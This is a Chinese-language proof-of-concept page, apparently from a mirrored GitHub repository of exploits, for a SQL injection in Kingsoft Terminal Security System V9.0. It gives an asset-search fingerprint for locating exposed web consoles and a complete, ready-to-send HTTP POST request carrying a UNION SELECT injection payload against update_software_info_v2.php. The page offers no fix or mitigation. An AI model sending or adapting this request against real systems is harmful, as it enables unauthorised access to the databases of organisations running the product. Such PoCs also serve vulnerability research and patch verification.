admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/金山/金山终端安全系统V9.0SQL注入漏洞.md

34 lines
1.2 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 金山终端安全系统V9.0 SQL注入漏洞
### 一、漏洞描述
<font style="color:rgb(0, 0, 0);">金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。</font>
### 二、影响版本
金山终端安全系统V9.0
### 三、资产测绘
app="金山终端安全系统V9.0Web控制台"
特征:
![1708655780558-39f26009-21b3-4401-a4dc-5c95b44a6fcd.png](./img/rElhjlKBz286TiEn/1708655780558-39f26009-21b3-4401-a4dc-5c95b44a6fcd-030937.png)
### 四、漏洞复现
```plain
POST /inter/update_software_info_v2.php HTTP/1.1
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Host: 139.xxx.xxx.xxx:6868
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 80
Connection: close
type=-100+UNION+SELECT+1,md5(078674232),1,1,1,1,1,1--&key=&pageCount=0&curPage=
```
![1708798065830-b49297cc-2af2-42c5-b632-673baac678c4.png](./img/rElhjlKBz286TiEn/1708798065830-b49297cc-2af2-42c5-b632-673baac678c4-069542.png)
> 更新: 2024-02-29 23:57:11
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aqzk9xw44zcyzkgt>
Reference in New Issue Copy Permalink